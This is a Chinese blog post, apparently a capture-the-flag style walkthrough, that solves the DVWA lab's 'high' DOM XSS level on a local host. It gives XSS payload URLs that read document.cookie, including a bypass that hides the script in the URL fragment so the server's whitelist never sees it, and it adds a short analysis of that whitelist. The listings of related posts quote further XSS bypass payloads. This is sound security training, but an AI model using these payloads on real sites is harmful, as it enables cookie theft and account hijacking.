DVWA - XSS DOM (high)

最新推荐文章于 2024-04-29 20:55:47 发布
最新推荐文章于 2024-04-29 20:55:47 发布
阅读量478 收藏
点赞数
分类专栏: dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42630215/article/details/106574338
版权

随便选择一个。url中会出现我们选的哪个
在这里插入图片描述

http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(document.cookie)%3C/script%3E

在这里插入图片描述
应该与medium级别一样,过滤了script标签

试试 <img src=1 onerror=alert(document.cookie)>

http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=%3Cimg%20src=1%20onerror=alert(document.cookie)%3E

在这里插入图片描述再换一种方法
URL的锚(#符号之后的任何内容)不会发送到服务器,因此无法被阻止

http://127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=English#%3Cscript%3Ealert(document.cookie)%3C/script%3E

在这里插入图片描述
成功执行

代码分析

在这里插入图片描述
可以看出,服务器端代码先判断defalut值是否为空,如果不为空的话,再用switch语句进行匹配,如果匹配成功,则插入case字段的相应值,如果不匹配,则插入的是默认的值。白名单只允许传的 default值 为 French English German Spanish 其中一个。

S1xTwe1ve
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DVWA - XSS DOM (low)
qq_42630215的博客
06-04 388
low级别 XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSSDOM型的XSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。 可能触发DOMXSS的属性:document.referer 属性wi
DVWA - XSS DOM (medium)
qq_42630215的博客
06-04 509
随便在选项里选一个,url中会出现我们选的哪个。 看看可不可以用<script>alert(document.cookie)</script> 127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=<script>alert(document.cookie)</script> 发现不会执行,而且语句也没有在url中显示,只显示English应该是过滤了方法一 换一个试一下<img src=1 one
DVWA-XSSDOM)Low/Medium/High低中高级别
wangyuxiang946的博客
10-22 1万+
DVWA-XSS(DOM) Low DVWA-XSS(DOM) Medium DVWA-XSS(DOM) High
DVWA靶场的XSS和SQL注入实战
bwxzdjn的博客
03-25 933
XSS和SQL注入学习后的实操,主要是借助DVWA靶场,通过对不同分类和过滤的实战,进一步掌握不同分类的XSS和SQL注入攻击方法。(不包含不可能章节)
网络安全-靶机dvwaXSS注入Low到High详解(含代码分析)_dvwa xss注入
最新发布
2303_79055586的博客
04-29 413
外链图片转存中…(img-J1KBhZuE-1714395335186)][外链图片转存中…(img-GwLZ0Yna-1714395335186)][外链图片转存中…(img-FGdqn29T-1714395335187)][外链图片转存中…(img-4tacwhLb-1714395335188)][外链图片转存中…(img-f6UpDGGB-1714395335188)][外链图片转存中…(img-G2HmD2q2-1714395335189)]
DVWA指点迷津-XSS(Stored)
肉肉球麻里的博客
10-23 213
XSS(Stored) 特点 又名“存储型XSS”。攻击者的“恶意语句”会存储在服务器端数据库,具有很强的稳定性。每次前端调用数据库内容,则会触发语句。一般出现在留言板、上传资料等与数据库有交互的模块。相比反射型XSS,该类型的XSS带来的危害更大,持续事件更久。 漏洞危害 泄露用户的Cooike 泄露用户的IP地址、浏览器信息 篡改网页 XSS钓鱼 DVWA Low 应用防御措施 服务器端只检查是否存在“name”和“message”这两个字段、数据库连接,以及转义特殊符号,接着进行Update,没对
dvwa学习笔记之xss
weixin_30814329的博客
03-27 168
反射型Low 直接输入<script>alert(/xss/)</script>就可以发现弹窗Medium 检查源码 可以看到网站对输入字符进行了过滤,尝试双写绕过,构造<scr<script>ipt>alert(/xss/)</script> 输入进行尝试,弹窗xss说明ok!另一种方法就是大小写混写 构造一个 ...
DVWA练习——XSS
haoaaao的博客
01-22 415
一、xss(reflected) (1)难度:low 提交代码 (2)难度:medium a、查看源代码,发现将<script>标签替换置空 b、发现将某个东西替换成空,首先想到“双写绕过”的办法 /****双写绕过eg:构造<sc<script>ript>,当<script>被过滤掉时,剩下的字符自动拼接在一起,就形成了<script> ****/ (3)、难度:high 查看源码,发现对多个...
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA 文件包含
m0_73606240的博客
01-08 826
DVWA File Include
DVWA源代码
10-16
dvwa web漏洞演示平台代码,有需要的朋友可以下载
DVWA—Brutefoce(暴力破解)
Cwillchris的博客
10-28 1323
DVWA靶机:172.16.12.10 windows攻击机:172.16.12.7 实验步骤: 一、Low级 1、查看源码及分析 先调整DVWA安全级别为Low,点击提交 点击左侧暴力破解,进入主题 查看源代码(在页面底部) 源码分析 <?php //检查变量是否设置(先看有没有Login参数) if( isset( $_GET[ 'Login' ] ) ) { //获取密码,存入pass变量中 $user = $_GET[ 'username' ].
网络安全-靶机dvwaXSS注入Low到High详解(含代码分析)
关注网络安全、云原生安全
10-18 8629
本篇文章,针对靶机dvwa(Damn Vulnerable Web Application)中的XSS(DOM)、XSS(Reflected)、XSS(Stored)的LOW、MIDIUM、HIGH安全级别使用网络安全-js安全知识点与XSS常用payloads中提到的XSS注入payloads,使用手工进行XSS注入。并根据网络安全-php安全知识点对LOW、MIDIUM、HIGH、IMPOSSIBLE安全级别的代码进行解释。 目标:弹出窗口/获得cookie XSS(DOM)-LOW 正常 可
DVWA全级别通关教程
热门推荐
weixin_52515588的博客
03-26 9万+
首先选择难度,我们从low开始,如上图所示进行修改 目录 SQL手工注入 过程: low Medium high Impossible SQL 盲注 过程: SQL 工具注入 工具安装过程: 过程: low Medium High: 暴力破解 过程: Low Medium High Impossible 命令注入 过程: Low Medium High: Impossible 文件上传 过程: Low Medium High Im...
DVWAXSS-----------------high+各级别总结
qq_43665434的博客
02-21 566
DVWAXSS-----------------high+各级别总结 1、Reflected 输入测试语句 查看网页源码: 尝试<script>alert(/xss/)</script>,以及其大小写混合、拼凑版本均不成功。 尝试其他标签绕过成功: <img src=1 onerror=alert(/xss/)> <svg onload=alert(/xss/)> 源码分析: preg_replace()函数正则匹配参数中的<script并替换
通过DVWA学习DOMXSS
Mi1k7ea
01-02 4028
下了个新版的DVWA看了下,发现新增了好几个Web漏洞类型,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :) 基本概念 DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞,其触...
DVWA靶场中的xss-反射型xss、存储型xss的low、medium、high的详细通关方法
qq_59020256的博客
12-27 1357
alert(1)尝试闭合,输入">alert(1)输入">alert(1)输入">alert(1)输入alert(1)输入alert(1)输入alert(1)输入alert(1)
DVWA-XSS (Stored) Low/Medium/High低中高级别
wangyuxiang946的博客
06-01 1万+
DVWA-XSS (Stored) Low DVWA-XSS (Stored) Medium DVWA-XSS (Stored) High
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值